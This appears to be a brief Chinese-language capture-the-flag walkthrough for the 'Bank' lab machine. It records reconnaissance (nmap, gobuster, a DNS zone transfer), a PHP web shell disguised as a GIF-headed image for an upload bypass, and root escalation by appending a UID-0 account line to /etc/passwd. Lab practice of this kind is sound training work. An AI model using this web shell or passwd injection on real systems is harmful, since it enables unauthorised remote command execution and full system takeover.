nmap -sC -sV -Pn 10.129.29.200 > nmap.txt
nmap -p- 10.129.29.200 > nmapall.txt
gobuster dir  -u http://bank.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,cgi -t50 > gobuster.txt


dig axfr @10.129.29.200
dig axfr @10.129.29.200 bank.htb
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 6 604800 86400 2419200 604800
bank.htb.               604800  IN      NS      ns.bank.htb.
bank.htb.               604800  IN      A       10.129.29.200
ns.bank.htb.            604800  IN      A       10.129.29.200
www.bank.htb.           604800  IN      CNAME   bank.htb.
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 6 604800 86400 2419200 604800

Linux version 4.4.0-79-generic (buildd@lcy01-30) (gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.3) ) #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017


1.nmap掃描出現有53port及80port
2.使用dig axfr檢測DNS紀錄,
3.gobuster發現有balance-transfe路徑
4.下載路徑下所有東西
wget -r http://bank.htb/balance-transfer/
5.發現有的檔案大小不一樣得檔案
ll | grep -v 'index' | sort
6.查找到帳密登入後，可以上傳檔案
echo GIF8 123132 > revers.jpg
echo <?php system($_GET["cmd"]);?> >> revers.jpg
7.將檔案改成.htb可以被當作php執行(burp可以看到反訊息)
8.etc/passwd提權
echo 'kali:$6$irbaKgZA08Nkvl/Z$IjChNZzrw1gt8D25jMGq7RoGV5uUxaVpc1ZxWGkGaqPZEi29iEb5iOLWg.dLQM.MkZUh9k9kFPlSjd6edBTTU1:0:0:root:/root:/bin/bash' >> /etc/passwd
